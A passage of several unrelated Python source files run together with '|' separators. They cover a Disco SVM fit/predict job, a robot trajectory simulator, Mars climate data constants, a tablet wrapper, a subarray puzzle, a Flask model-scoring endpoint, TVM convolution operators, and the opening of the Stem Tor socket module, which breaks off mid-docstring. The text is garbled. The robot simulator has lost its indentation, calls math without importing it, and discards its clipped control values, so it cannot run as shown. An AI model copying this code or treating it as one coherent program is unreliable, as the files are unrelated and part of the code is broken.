    parameters and emit (sample_id, (predicted_label,)) pairs."""
    import numpy as np
    out = interface.output(0)
    for line in inp:
        fields = line.strip().split(state["delimiter"])
        if len(fields) <= 1:
            continue
        # Sample id ("" when no id column was configured).
        sample_id = "" if state["id_index"] == -1 else fields[state["id_index"]]
        # Feature vector with the -1 intercept term appended.
        x = [0 if val in state["missing_vals"] else float(val)
             for idx, val in enumerate(fields) if idx in state["X_indices"]]
        x.append(-1)
        # Sign of the decision value selects the output label.
        score = np.dot(x, state["fit_params"])
        label_out = state["y_map"][0] if score >= 0 else state["y_map"][1]
        out.add(sample_id, (label_out,))
def fit(dataset, nu=0.1, save_results=True, show=False):
    """
    Function starts a job for calculation of model parameters
    Parameters
    ----------
    input - dataset object with input urls and other parameters
    nu - parameter to adjust the classifier
    save_results - save results to ddfs
    show - show info about job execution
    Returns
    -------
    Urls of fit model results on ddfs
    """
    from disco.worker.pipeline.worker import Worker, Stage
    from disco.core import Job
    # A label mapping is mandatory: map_fit converts labels to +1/-1 with it.
    if dataset.params["y_map"] == []:
        raise Exception("Linear proximal SVM requires a target label mapping parameter.")
    try:
        nu = float(nu)
        if nu <= 0:
            # NOTE: deliberately not a ValueError, so it propagates past
            # the except clause below instead of being re-labelled.
            raise Exception("Parameter nu should be greater than 0")
    except ValueError:
        raise Exception("Parameter should be numerical.")
    job = Job(worker=Worker(save_results=save_results))
    # job parallelizes mappers and joins them with one reducer
    job.pipeline = [
        ("split", Stage("map", input_chain=dataset.params["input_chain"], init=simple_init, process=map_fit)),
        ('group_all', Stage("reduce", init=simple_init, process=reduce_fit, combine=True))]
    job.params = dataset.params
    job.params["nu"] = nu
    job.run(name="linearsvm_fit", input=dataset.params["data_tag"])
    fitmodel_url = job.wait(show=show)
    return {"linsvm_fitmodel": fitmodel_url}  # return results url
def predict(dataset, fitmodel_url, save_results=True, show=False):
    """
    Function starts a job that makes predictions to input data with a given model.
    Parameters
    ----------
    input - dataset object with input urls and other parameters
    fitmodel_url - model created in fit phase
    save_results - save results to ddfs
    show - show info about job execution
    Returns
    -------
    Urls with predictions on ddfs
    """
    from disco.worker.pipeline.worker import Worker, Stage
    from disco.core import Job, result_iterator
    # Guard against being handed a model produced by a different algorithm.
    if "linsvm_fitmodel" not in fitmodel_url:
        raise Exception("Incorrect fit model.")
    job = Job(worker=Worker(save_results=save_results))
    # job parallelizes execution of mappers
    job.pipeline = [
        ("split", Stage("map", input_chain=dataset.params["input_chain"], init=simple_init, process=map_predict))]
    job.params = dataset.params
    # The reducer emits exactly one "params" record; take its value.
    job.params["fit_params"] = [v for _, v in result_iterator(fitmodel_url["linsvm_fitmodel"])][0]
    job.run(name="linsvm_predict", input=dataset.params["data_tag"])
    return job.wait(show=show)
|
import numpy as np
import matplotlib.pyplot as plt
class Robot():
def __init__(self, time, x0, y0, tetta0, xf, yf, tettaf):
self.x_history = [x0]
self.y_history = [y0]
self.tetta_history = [tetta0]
self.time_history = [0.0]
self.control_history = [(0.0, 0.0)]
self.sim_time = time
self.xf = xf
self.yf = yf
self.tettaf = tettaf
self.eps = 0.01
self.control_func = None
self.dt = 0.01
def set_control_function(self, f):
def g(*args, **kwargs):
return f(*args, **kwargs)
self.control_func = g
def set_dt(self, dt):
self.dt = dt
def simulate(self, dt=0.01):
t = dt
su = 0
x1, y1 = 5, 5 # obsticle with shape of circle with middle point at 5, 5
rad = 2.5 # radius
while t < self.sim_time:
new_x, new_y, new_tetta = self.__euler_step(dt)
if new_x == 1e+6 or new_y == 1e+6 or new_tetta == 1e+6: return 1e+6 # return right positive limit and exit
try:
dr = math.pow(rad, 2) - math.pow(x1 - new_x, 2) - math.pow(y1 - new_y, 2)
if dr > 0: su = su + 1
except: pass
estimation = self.estimate()
if estimation > 1e+6: return 1e+6
self.x_history.append(new_x)
self.y_history.append(new_y)
self.tetta_history.append(new_tetta)
self.time_history.append(t)
if estimation < self.eps: return t
t += dt
return self.sim_time + estimation + su * dt
def __euler_step(self, dt):
x, y, tetta = self.__get_current_coords()
dx, dy, dtetta = self.__get_right_parts(tetta)
if dx > 1e+6 or dy > 1e+6 or dtetta > 1e+6: return 1e+6, 1e+6, 1e+6
tilda_x = x + dt * dx
tilda_y = y + dt * dy
tilda_tetta = tetta + dt * dtetta
tdx, tdy, tdtetta = self.__get_right_parts(tilda_tetta)
x = x + (dx + tdx) * 0.5 * dt
y = y + (dy + tdy) * 0.5 * dt
tetta = tetta + (dtetta + tdtetta) * 0.5 * dt
return x, y, tetta
def __get_right_parts(self, tetta):
current_coords = self.__get_current_coords()
terminal_coords = self.__get_terminal_coords()
state = terminal_coords - current_coords
u1, u2 = self.control_func(state)
self.clip_control(u1) # TODO: set control limits inside __init__
self.clip_control(u2)
self.control_history.append((u1, u2))
right_x = (u1 + u2) * np.cos(tetta) * 0.5
right_y = (u1 + u2) * np.sin(tetta) * 0.5
right_tetta = (u1 - u2) * 0.5
return right_x, right_y, right_tetta
def clip_control(self, u):
if u < -10: return -10
elif u > 10: return 10
else: return u
def __get_current_coords(self,):
return np.array([self.x_history[-1], self.y_history[-1], self.tetta_history[-1]])
def __get_terminal_coords(self,):
return np.array([self.xf, self.yf, self.tettaf])
def estimate(self,):
v0 = self.__get_current_coords()
vf = self.__get_terminal_coords()
return np.linalg.norm(vf - v0)
def reset(self,):
self.x_history = [self.x_history[0]]
self.y_history = [self.y_history[0]]
self.tetta_history = [self.tetta_history[0]]
self.time_history = [0.0]
self.control_histroy = [(0.0, 0.0)]
def get_coords(self,):
return (self.x_history, self.y_history)
def get_control_in_time(self,):
return (self.time_history, self.control_history)
def plot_trajectory(self,):
x, y = self.get_coords()
fig = plt.figure()
plt.plot(x, y, 'r')
plt.xlabel('${x}$',fontsize=20)
plt.ylabel('${y}$',fontsize=20)
plt.legend(['${y}({x})$'],loc='upper right')
plt.show()
def plot_control_in_time(self):
    """Plot the control signals u(t) over time and show the figure."""
    t, u = self.get_control_in_time()
    # Figure creation is the side effect we need; the unused handle binding
    # from the original is dropped.
    plt.figure()
    plt.plot(t, u, 'b')
    plt.xlabel('${t}$', fontsize=20)
    plt.ylabel('${u}$', fontsize=20)
    plt.legend(['${u}({t})$'], loc='upper right')
    plt.show()
|
# ==== PHYSICS CONSTANTS ====
# BOLTZMAN
# NOTE(review): despite the name, 5.6704e-8 (W m^-2 K^-4) is the value of the
# Stefan-Boltzmann constant, not Boltzmann's constant. Confirm with callers
# before renaming.
BOLTZMAN_CONSTANT = 5.6704 * (10 ** -8)
# KELVIN
# Offset between degrees Celsius and kelvin.
DELTA_KELVIN = 273.15
# ==== SOFTWARE RELATED ====
SETTINGS_FILE_PATH = "settings.json"
SETTINGS_TEMPLATE_FILE_PATH = "settingsTemplate.json"
# ==== BASE SCI CONSTANTS ====
# Valid latitude range in degrees.
LAT_MARGINS = [-90, 90]
# Valid longitude range in degrees (0..360 convention).
LON_MARGINS = [0, 360]
# Number of longitude grid steps per latitude row.
LON_STEPS_PER_LAT = 145
# Column names for the generated output table; the "Lat_*" columns hold
# per-latitude aggregates of the per-point values.
TABLE_HEADER = [
    "Latitude",
    "Longitude",
    "Tsurfmx",
    "Tsurfmn",
    "Tsurfmx_Watt/m2",
    "Tsurfmn_Watt/m2",
    "AVG_Watt/m2",
    "Lat_AVG_Tsurfmx_Watt/m2",
    "Lat_AVG_Tsurfmn_Watt/m2",
    "Lat_AVG_Watt/m2",
    "Lat_Max_Tsurfmx_Watt/m2",
    "Lat_Min_Tsurfmn_Watt/m2",
]
# Input data directories (daily max / daily min surface temperature records).
TSURFMX_DIR = "../data/tsurfmx/"
TSURFMN_DIR = "../data/tsurfmn/"
# Record type keys accepted by the data reader; each key has a human-readable
# description in RECORD_TYPES_TABLE below.
VALID_RECORD_TYPES = [
    "t",
    "p",
    "rho",
    "wind",
    "w",
    "u",
    "v",
    "tsurf",
    "ps",
    "tau",
    "qdust",
    "rdust",
    "sdust",
    "mtot",
    "icetot",
    "h2ovap",
    "h2oice",
    "rice",
    "co2ice",
    "groundice",
    "pbl",
    "stress",
    "updraft",
    "downdraft",
    "pblwvar",
    "pblhvar",
    "ps_ddv",
    "p_ddv",
    "t_ddv",
    "u_ddv",
    "v_ddv",
    "w_ddv",
    "rho_ddv",
    "tau_ddv",
    "tsurfmx",
    "tsurfmn",
    "lwdown",
    "swdown",
    "lwup",
    "swup",
    "co2col",
    "arcol",
    "n2col",
    "cocol",
    "o3col",
    "co2",
    "ar",
    "n2",
    "co",
    "o3",
    "o",
    "o2",
    "hydro",
    "hydro2",
    "e",
    "ecol",
    "hecol",
    "he",
    "cp",
    "visc",
]
# Human-readable description for each record type key.
RECORD_TYPES_TABLE = {
    # BUG FIX: the "t" entry previously contained scraped HTML residue
    # ('"selected=" ">Temperature (K)"'); restored to the plain description
    # matching the style of every other entry.
    "t": "Temperature (K)",
    "p": "Pressure (Pa)",
    "rho": "Density (kg/m3)",
    "wind": "Horizontal wind (m/s)",
    "w": "Vertical wind (m/s, pos. when downward)",
    "u": "W-E wind component (m/s)",
    "v": "S-N wind component (m/s)",
    "tsurf": "Surface temperature (K)",
    "ps": "Surface pressure (Pa)",
    "tau": "Dust column vis opt depth above surf",
    "qdust": "Dust mass mixing ratio (kg/kg)",
    "rdust": "Dust effective radius (m)",
    "sdust": "Dust deposition on flat surface (kg/m2/s)",
    "mtot": "Water vapor column (kg/m2)",
    "icetot": "Water cloud ice column (kg/m2)",
    "h2ovap": "Water vapor vol. mixing ratio (mol/mol)",
    "h2oice": "Water ice mixing ratio (mol/mol)",
    "rice": "Water ice effective radius (m)",
    "co2ice": "surface CO2 ice layer (kg/m2)",
    "groundice": "surface H2O ice layer (kg/m2, 0.5: perennial)",
    "pbl": "Convective PBL height (m)",
    "stress": "Surf. wind stress (Kg/m/s2)",
    "updraft": "Max PBL updraft wind (m/s)",
    "downdraft": "Max PBL downdraft wind (m/s)",
    "pblwvar": "PBL vert wind variance (m2/s2)",
    "pblhvar": "PBL eddy vert heat flux (m/s/K)",
    "ps_ddv": "Surf. pres. day to day variability (Pa)",
    "p_ddv": "Pressure day to day variability (Pa)",
    "t_ddv": "Temperature day to day variability (K)",
    "u_ddv": "zonal wind day to day variability (m/s)",
    "v_ddv": "merid. wind day to day variability (m/s)",
    "w_ddv": "vert. wind day to day variability (m/s)",
    "rho_ddv": "density day to day variability (kg/m^3)",
    "tau_ddv": "Dust column day to day variability",
    "tsurfmx": "daily max mean surf temperature (K)",
    "tsurfmn": "daily min mean surf temperature (K)",
    "lwdown": "thermal IR flux to surface (W/m2)",
    "swdown": "solar flux to surface (W/m2)",
    "lwup": "thermal IR flux to space (W/m2)",
    "swup": "solar flux reflected to space (W/m2)",
    "co2col": "CO2 column (kg/m2)",
    "arcol": "Ar column (kg/m2)",
    "n2col": "N2 column (kg/m2)",
    "cocol": "CO column (kg/m2)",
    "o3col": "O3 column (kg/m2)",
    "co2": "[CO2] vol. mixing ratio (mol/mol)",
    "ar": "[Ar] vol. mixing ratio (mol/mol)",
    "n2": "[N2] vol. mixing ratio (mol/mol)",
    "co": "[CO] vol. mixing ratio (mol/mol)",
    "o3": "[O3] ozone vol. mixing ratio (mol/mol)",
    "o": "[O] vol. mixing ratio (mol/mol)",
    "o2": "[O2] vol. mixing ratio (mol/mol)",
    "hydro": "[H] vol. mixing ratio (mol/mol)",
    "hydro2": "[H2] vol. mixing ratio (mol/mol)",
    "e": "electron number density (cm-3)",
    "ecol": "Total Electronic Content (TEC) (m-2)",
    "hecol": "He column (kg/m2)",
    "he": "[He] vol. mixing ratio (mol/mol)",
    "cp": "Air heat capacity Cp (J kg-1 K-1)",
    "visc": "Air viscosity estimation (N s m-2)",
}
|
class Tablet:
    """Thin wrapper around a tablet proxy object.

    NOTE(review): the proxy method semantics (setBackgroundColor / showImage /
    preLoadImage) are assumed from their names — confirm against the concrete
    tablet service API.
    """

    def __init__(self, tablet_proxy):
        self._tablet = tablet_proxy

    def set_background(self, color):
        """Set the tablet background color."""
        self._tablet.setBackgroundColor(color)

    def set_image(self, url):
        """Display the image at *url* on the tablet."""
        self._tablet.showImage(url)

    def load_image(self, url):
        """Pre-load the image at *url* and return the proxy's result.

        BUG FIX: the original referenced the misspelled attribute
        ``self._table`` and always raised AttributeError.
        """
        return self._tablet.preLoadImage(url)
|
class Solution:
    """
    @param nums: An array of integers
    @return: An integer
    """

    def maxProduct(self, nums):
        # Maximum product of a contiguous subarray. Track both the largest
        # and smallest product ending at each position, since multiplying by
        # a negative value swaps their roles.
        if not nums:
            return 0
        best = hi = lo = nums[0]
        for v in nums[1:]:
            candidates = (v, hi * v, lo * v)
            hi, lo = max(candidates), min(candidates)
            best = max(best, hi)
        return best
###################################
# Overview
#
# Script to expose endpoints
###################################
import flask
from flask import request, jsonify
from scoring_functions import prediction_function
from joblib import load
# Model is deserialized once at import time so every request reuses it.
clf = load('models/random_forest_model.joblib')
# Flask application serving the scoring endpoint(s) below.
app = flask.Flask(__name__)
# app.config["DEBUG"] = True # Get hints from web page if it endpoint fails.
# os.chdir('S:/Python/projects/aws_docker_py/python_files')
# http://127.0.0.1:5000/scoreHere?json_input=[[0.0, 0.0]]
@app.route('/scoreHere', methods=['GET'])
def calc_scores():
    """Score the JSON-encoded feature rows passed as ``?json_input=...``.

    Returns the model's predictions as a JSON response. A missing
    ``json_input`` query parameter is reported by Flask as a 400 error.
    """
    json_input = request.args['json_input']
    out = prediction_function(json_input=json_input, skmodel=clf)
    return jsonify(out)


if __name__ == '__main__':
    # Guard the dev server start so importing this module (e.g. under a WSGI
    # server such as gunicorn) doesn't launch a second, conflicting server.
    app.run(host="0.0.0.0", port=5000)
import tvm
def gemm(A, B, transposeA=False, transposeB=False):
    """Matrix multiplies matrix
    Args:
    -----------------------------
    A: tvm.te.tensor.Tensor
        shape [height, width]
    B: tvm.te.tensor.Tensor
        shape [width, length]
    transposeA: (optional:False) bool
    transposeB: (optional:False) bool
    -----------------------------
    Returns:
    -----------------------------
    tvm.te.tensor.Tensor
        shape [height, length]
    -----------------------------
    """
    # Each branch builds the same contraction with the index roles swapped
    # according to which operands are transposed; the asserts check that the
    # contracted extents agree.
    if transposeA and transposeB:
        # C = A^T * B^T; reduce over A's first axis == B's second axis.
        k = tvm.te.reduce_axis((0, B.shape[1]))
        assert (A.shape[0].value == B.shape[1].value)
        return tvm.te.compute((A.shape[1], B.shape[0]), lambda i, j: tvm.te.sum(A[k, i] * B[j, k], axis=k))
    elif transposeA and not transposeB:
        # C = A^T * B
        k = tvm.te.reduce_axis((0, B.shape[0]))
        assert (A.shape[0].value == B.shape[0].value)
        return tvm.te.compute((A.shape[1], B.shape[1]), lambda i, j: tvm.te.sum(A[k, i] * B[k, j], axis=k))
    elif not transposeA and transposeB:
        # C = A * B^T
        k = tvm.te.reduce_axis((0, B.shape[1]))
        assert (A.shape[1].value == B.shape[1].value)
        return tvm.te.compute((A.shape[0], B.shape[0]), lambda i, j: tvm.te.sum(A[i, k] * B[j, k], axis=k))
    else:
        # C = A * B (plain GEMM)
        k = tvm.te.reduce_axis((0, B.shape[0]))
        assert (A.shape[1].value == B.shape[0].value)
        return tvm.te.compute((A.shape[0], B.shape[1]), lambda i, j: tvm.te.sum(A[i, k] * B[k, j], axis=k))
def zero_pad2d(inputs, padding=0):
    """Zero padding for 2d tensor
    Args:
    -----------------------------
    inputs : tvm.te.tensor.Tensor
        shape [batch, channel, height, width]
    padding: (optional:0) int or tuple
        expected: (h_pad_up, h_pad_down, w_pad_up, w_pad_down)
    -----------------------------
    Returns:
    -----------------------------
    tvm.te.tensor.Tensor
        shape [batch, channel, padded_height, padded_width]
    -----------------------------
    """
    # Normalize scalar padding to a 4-tuple (h_up, h_down, w_up, w_down).
    padding = (padding, padding, padding, padding) if isinstance(padding, (int, tvm.tir.IntImm)) else padding
    assert isinstance(padding, tuple)
    if len(padding) == 2:
        # (h_pad, w_pad) shorthand: duplicate each value for both sides.
        padding = (padding[0], padding[0], padding[1], padding[1])
    assert (len(padding) == 4)
    # Match the fill value's type to the tensor dtype (float vs int zero).
    padding_zero = 0.0 if "float" in inputs.dtype else 0
    batch_size, in_channel, height, width = inputs.shape
    return tvm.te.compute(
        (batch_size, in_channel, height + padding[0] + padding[1], width + padding[2] + padding[3]),
        lambda b, c, h, w: tvm.te.if_then_else(
            # Inside the original extent -> copy input, otherwise the zero value.
            tvm.te.all(h >= padding[0], h < height + padding[0], w >= padding[2], w < width + padding[2]),
            inputs[b, c, h - padding[0], w - padding[2]],
            padding_zero
        ),
        name='Padding'
    )
def conv2d_nchw(inputs, weight, bias=None, stride=1, padding=0, dilation=1, groups=1):
    """Convolution 2d NCHW layout
    Args:
    -----------------------------
    inputs : tvm.te.tensor.Tensor
        shape [batch, channel, height, width]
    weight : tvm.te.tensor.Tensor
        shape [out_channel, channel // groups, kernel_height, kernel_width]
    bias : (optional:None) tvm.te.tensor.Tensor
        shape [out_channel]
    stride : (optional:1) int or tuple
    padding : (optional:0) int or tuple
    dilation: (optional:1) int
    groups : (optional:1) int
    -----------------------------
    Returns:
    -----------------------------
    tvm.te.tensor.Tensor
        shape [batch, out_channel, output_height, output_width]
    -----------------------------
    """
    batch_size, in_channel, in_h, in_w = inputs.shape
    out_channel, channel_per_group, k_h, k_w = weight.shape
    # Grouped conv: the weight's channel axis times the group count must
    # cover the input channels, and out_channel must divide evenly by groups.
    assert ((channel_per_group * groups).value == in_channel.value)
    out_channel_per_group = out_channel // groups
    assert ((out_channel_per_group * groups).value == out_channel.value)
    # Normalize scalar arguments to (h, w) pairs.
    stride = (stride, stride) if isinstance(stride, (int, tvm.tir.IntImm)) else stride
    padding = (padding, padding) if isinstance(padding, (int, tvm.tir.IntImm)) else padding
    dilation = (dilation, dilation) if isinstance(dilation, (int, tvm.tir.IntImm)) else dilation
    assert (isinstance(stride, tuple) and len(stride) == 2)
    assert (isinstance(padding, tuple) and len(padding) == 2)
    assert (isinstance(dilation, tuple) and len(dilation) == 2)
    # Standard output-size formula for strided, dilated convolution.
    out_h = (in_h + 2 * padding[0] - dilation[0] * (k_h - 1) - 1) // stride[0] + 1
    out_w = (in_w + 2 * padding[1] - dilation[1] * (k_w - 1) - 1) // stride[1] + 1
    rc = tvm.te.reduce_axis((0, channel_per_group), name="rc")
    rh = tvm.te.reduce_axis((0, k_h), name="rh")
    rw = tvm.te.reduce_axis((0, k_w), name="rw")
    padded = zero_pad2d(inputs, padding=padding)
    output = tvm.te.compute(
        (batch_size, out_channel, out_h, out_w),
        lambda b, c, h, w: tvm.te.sum(
            # c // out_channel_per_group selects the group; rc walks that
            # group's input channels within the padded input.
            (padded[b, c // out_channel_per_group * channel_per_group + rc,
                    h * stride[0] + rh * dilation[0], w * stride[1] + rw * dilation[1]]
             * weight[c, rc, rh, rw]),
            axis=[rc, rw, rh]
        )
    )
    if bias is not None:
        # Broadcast the per-channel bias over batch and spatial dimensions.
        output = tvm.te.compute(
            (batch_size, out_channel, out_h, out_w),
            lambda b, c, h, w: output[b, c, h, w] + bias[c]
        )
    return output
def GEMM(M, K, N):
    """Build a plain (M, K) x (K, N) matrix-multiply compute graph.

    Returns ([output op], [input/output tensors]) for downstream scheduling.
    """
    lhs = tvm.te.placeholder((M, K), name="A")
    rhs = tvm.te.placeholder((K, N), name="B")
    product = gemm(lhs, rhs)
    return [product.op], [lhs, rhs, product]
def Conv2d(N, C, H, W, K, k, stride=1, padding=0, dilation=1, groups=1):
    """Build a conv2d (NCHW) compute graph.

    N/C/H/W: input batch, channels, height, width; K: output channels;
    k: square kernel size. Returns ([output op], [input/output tensors]).
    """
    data = tvm.te.placeholder((N, C, H, W), name="A")
    # BUG FIX: the weight's channel axis must be C // groups (conv2d_nchw
    # asserts channel_per_group * groups == C); the original used C, which
    # failed for any groups > 1. Identical for the default groups=1.
    kernel = tvm.te.placeholder((K, C // groups, k, k), name="B")
    # Bind the result to a fresh name instead of rebinding (shadowing) the
    # parameter C as the original did.
    conv = conv2d_nchw(data, kernel, bias=None, stride=stride, padding=padding, dilation=dilation, groups=groups)
    return [conv.op], [data, kernel, conv]
# Copyright 2011-2019, Damian Johnson and The Tor Project
# See LICENSE for licensing information
"""
Supports communication with sockets speaking Tor protocols. This
allows us to send messages as basic strings, and receive responses as
:class:`~stem.response.ControlMessage` instances.
**This module only consists of low level components, and is not intended for
users.** See our `tutorials <../tutorials.html>`_ and `Control Module
<control.html>`_ if you're new to Stem and looking to get started.
With that aside, these can still be used for raw socket communication with
Tor...
::
import stem
import stem.connection
import stem.socket
if __name__ == '__main__':
try:
control_socket = stem.socket.ControlPort(port = 9051)
stem.connection.authenticate(control_socket)
except stem.SocketError as exc:
print 'Unable to connect to tor on port 9051: %s' % exc
sys.exit(1)
except stem.connection.AuthenticationFailure as exc:
print 'Unable to authenticate: %s' % exc
sys.exit(1)
print "Issuing 'GETINFO version' query...\\n"
control_socket.send('GETINFO version')
print control_socket.recv()
::
% python example.py
Issuing 'GETINFO version' query...
version=0.2.4.10-alpha-dev (git-8be6058d8f31e578)
OK
**Module Overview:**
::
BaseSocket - Thread safe socket.
|- RelaySocket - Socket for a relay's ORPort.
| |- send - sends a message to the socket
| +- recv - receives a response from the socket
|
|- ControlSocket - Socket wrapper that speaks the tor control protocol.
| |- ControlPort - Control connection via a port.
| |- ControlSocketFile - Control connection via a local file socket.
| |
| |- send - sends a message to the socket
| +- recv - receives a ControlMessage from the socket
|
|- is_alive - reports if the socket is known to be closed
|- is_localhost - returns if the socket is for the local system or not
|- connection_time - timestamp when socket last connected or disconnected
|- connect - connects a new socket
|- close - shuts down the socket
+- __enter__ / __exit__ - manages socket connection
send_message - Writes a message to a control socket.
recv_message - Reads a ControlMessage from a control socket.
send_formatting - Performs the formatting expected from sent messages.
"""
from __future__ import absolute_import
import re
import socket
import ssl
import threading
import time
import stem.prereq
import stem.response
import stem.util.str_tools
from stem.util import log
# Control replies start with a three-character status code followed by a
# divider that is '-', '+' or ' '.
MESSAGE_PREFIX = re.compile(b'^[a-zA-Z0-9]{3}[-+ ]')
ERROR_MSG = 'Error while receiving a control message (%s): %s'
# lines to limit our trace logging to, you can disable this by setting it to None
TRUNCATE_LOGS = 10
class BaseSocket(object):
    """
    Thread safe socket, providing common socket functionality.
    """

    def __init__(self):
        # The raw socket and its file-like wrapper (from makefile) travel
        # together; both are None while disconnected.
        self._socket, self._socket_file = None, None
        self._is_alive = False
        self._connection_time = 0.0  # time when we last connected or disconnected
        # Tracks sending and receiving separately. This should be safe, and doing
        # so prevents deadlock where we block writes because we're waiting to read
        # a message that isn't coming.
        self._send_lock = threading.RLock()
        self._recv_lock = threading.RLock()

    def is_alive(self):
        """
        Checks if the socket is known to be closed. We won't be aware if it is
        until we either use it or have explicitly shut it down.

        In practice a socket derived from a port knows about its disconnection
        after failing to receive data, whereas socket file derived connections
        know after either sending or receiving data.

        This means that to have reliable detection for when we're disconnected
        you need to continually pull from the socket (which is part of what the
        :class:`~stem.control.BaseController` does).

        :returns: **bool** that's **True** if our socket is connected and **False**
          otherwise
        """
        return self._is_alive

    def is_localhost(self):
        """
        Returns if the connection is for the local system or not.

        :returns: **bool** that's **True** if the connection is for the local host
          and **False** otherwise
        """
        # Conservative default; subclasses override when they can tell.
        return False

    def connection_time(self):
        """
        Provides the unix timestamp for when our socket was either connected or
        disconnected. That is to say, the time we connected if we're currently
        connected and the time we disconnected if we're not connected.

        .. versionadded:: 1.3.0

        :returns: **float** for when we last connected or disconnected, zero if
          we've never connected
        """
        return self._connection_time

    def connect(self):
        """
        Connects to a new socket, closing our previous one if we're already
        attached.

        :raises: :class:`stem.SocketError` if unable to make a socket
        """
        with self._send_lock:
            # Closes the socket if we're currently attached to one. Once we're no
            # longer alive it'll be safe to acquire the recv lock because recv()
            # calls no longer block (raising SocketClosed instead).
            if self.is_alive():
                self.close()
            with self._recv_lock:
                self._socket = self._make_socket()
                self._socket_file = self._socket.makefile(mode = 'rwb')
                self._is_alive = True
                self._connection_time = time.time()
                # It's possible for this to have a transient failure...
                # SocketError: [Errno 4] Interrupted system call
                #
                # It's safe to retry, so give it another try if it fails.
                try:
                    self._connect()
                except stem.SocketError:
                    self._connect()  # single retry

    def close(self):
        """
        Shuts down the socket. If it's already closed then this is a no-op.
        """
        with self._send_lock:
            # Function is idempotent with one exception: we notify _close() if this
            # is causing our is_alive() state to change.
            is_change = self.is_alive()
            if self._socket:
                # if we haven't yet established a connection then this raises an error
                # socket.error: [Errno 107] Transport endpoint is not connected
                try:
                    self._socket.shutdown(socket.SHUT_RDWR)
                except socket.error:
                    pass
                # Suppressing unexpected exceptions from close. For instance, if the
                # socket's file has already been closed then with python 2.7 that raises
                # with...
                # error: [Errno 32] Broken pipe
                try:
                    self._socket.close()
                except:
                    pass
            if self._socket_file:
                try:
                    self._socket_file.close()
                except:
                    pass
            self._socket = None
            self._socket_file = None
            self._is_alive = False
            self._connection_time = time.time()
            if is_change:
                self._close()

    def _send(self, message, handler):
        """
        Send message in a thread safe manner. Handler is expected to be of the form...

        ::

          my_handler(socket, socket_file, message)
        """
        with self._send_lock:
            try:
                if not self.is_alive():
                    raise stem.SocketClosed()
                handler(self._socket, self._socket_file, message)
            except stem.SocketClosed:
                # if send_message raises a SocketClosed then we should properly shut
                # everything down
                if self.is_alive():
                    self.close()
                raise

    def _recv(self, handler):
        """
        Receives a message in a thread safe manner. Handler is expected to be of the form...

        ::

          my_handler(socket, socket_file)
        """
        with self._recv_lock:
            try:
                # makes a temporary reference to the _socket_file because connect()
                # and close() may set or unset it
                my_socket, my_socket_file = self._socket, self._socket_file
                if not my_socket or not my_socket_file:
                    raise stem.SocketClosed()
                return handler(my_socket, my_socket_file)
            except stem.SocketClosed:
                # If recv_message raises a SocketClosed then we should properly shut
                # everything down. However, there's a couple cases where this will
                # cause deadlock...
                #
                # * This SocketClosed was *caused by* a close() call, which is joining
                #   on our thread.
                #
                # * A send() call that's currently in flight is about to call close(),
                #   also attempting to join on us.
                #
                # To resolve this we make a non-blocking call to acquire the send lock.
                # If we get it then great, we can close safely. If not then one of the
                # above are in progress and we leave the close to them.
                if self.is_alive():
                    if self._send_lock.acquire(False):
                        self.close()
                        self._send_lock.release()
                raise

    def _get_send_lock(self):
        """
        The send lock is useful to classes that interact with us at a deep level
        because it's used to lock :func:`stem.socket.ControlSocket.connect` /
        :func:`stem.socket.BaseSocket.close`, and by extension our
        :func:`stem.socket.BaseSocket.is_alive` state changes.

        :returns: **threading.RLock** that governs sending messages to our socket
          and state changes
        """
        return self._send_lock

    def __enter__(self):
        return self

    def __exit__(self, exit_type, value, traceback):
        self.close()

    def _connect(self):
        """
        Connection callback that can be overwritten by subclasses and wrappers.
        """
        pass

    def _close(self):
        """
        Disconnection callback that can be overwritten by subclasses and wrappers.
        """
        pass

    def _make_socket(self):
        """
        Constructs and connects new socket. This is implemented by subclasses.

        :returns: **socket.socket** for our configuration

        :raises:
          * :class:`stem.SocketError` if unable to make a socket
          * **NotImplementedError** if not implemented by a subclass
        """
        raise NotImplementedError('Unsupported Operation: this should be implemented by the BaseSocket subclass')
class RelaySocket(BaseSocket):
    """
    `Link-level connection
    <https://gitweb.torproject.org/torspec.git/tree/tor-spec.txt>`_ to a Tor
    relay.

    .. versionadded:: 1.7.0

    :var str address: address our socket connects to
    :var int port: ORPort our socket connects to
    """

    def __init__(self, address = '127.0.0.1', port = 9050, connect = True):
        """
        RelaySocket constructor.

        :param str address: ip address of the relay
        :param int port: orport of the relay
        :param bool connect: connects to the socket if True, leaves it unconnected otherwise

        :raises: :class:`stem.SocketError` if connect is **True** and we're
          unable to establish a connection
        """
        super(RelaySocket, self).__init__()
        self.address = address
        self.port = port
        if connect:
            self.connect()

    def send(self, message):
        """
        Sends a message to the relay's ORPort.

        :param str message: message to be formatted and sent to the socket

        :raises:
          * :class:`stem.SocketError` if a problem arises in using the socket
          * :class:`stem.SocketClosed` if the socket is known to be shut down
        """
        # Relay messages are written verbatim, without control-protocol framing.
        self._send(message, lambda s, sf, msg: _write_to_socket(sf, msg))

    def recv(self, timeout = None):
        """
        Receives a message from the relay.

        :param float timeout: maximum number of seconds to await a response, this
          blocks indefinitely if **None**

        :returns: bytes for the message received

        :raises:
          * :class:`stem.ProtocolError` the content from the socket is malformed
          * :class:`stem.SocketClosed` if the socket closes before we receive a complete message
        """
        def wrapped_recv(s, sf):
            if timeout is None:
                return s.recv()
            else:
                # NOTE(review): settimeout() overrides the prior setblocking(0),
                # so the setblocking call appears redundant — confirm before
                # removing. A timeout surfaces as None rather than an exception.
                s.setblocking(0)
                s.settimeout(timeout)
                try:
                    return s.recv()
                except (socket.timeout, ssl.SSLError, ssl.SSLWantReadError):
                    return None
                finally:
                    s.setblocking(1)
        return self._recv(wrapped_recv)

    def is_localhost(self):
        # Only the loopback address counts as local for a TCP relay socket.
        return self.address == '127.0.0.1'

    def _make_socket(self):
        try:
            relay_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            relay_socket.connect((self.address, self.port))
            # NOTE(review): ssl.wrap_socket is deprecated in modern Python;
            # consider ssl.SSLContext.wrap_socket once legacy support is dropped.
            return ssl.wrap_socket(relay_socket)
        except socket.error as exc:
            raise stem.SocketError(exc)
class ControlSocket(BaseSocket):
    """
    Socket wrapper speaking the Tor control protocol. This largely hides the
    formatting needed for sending and receiving complete control messages.

    Don't instantiate this class directly: use a subclass that implements the
    **_make_socket()** method instead.
    """

    def __init__(self):
        super(ControlSocket, self).__init__()

    def send(self, message):
        """
        Formats and sends a message to the control socket. For more information see
        the :func:`~stem.socket.send_message` function.

        .. deprecated:: 1.7.0
           The **raw** argument was unhelpful and be removed. Use
           :func:`stem.socket.send_message` if you need this level of control
           instead.

        :param str message: message to be formatted and sent to the socket

        :raises:
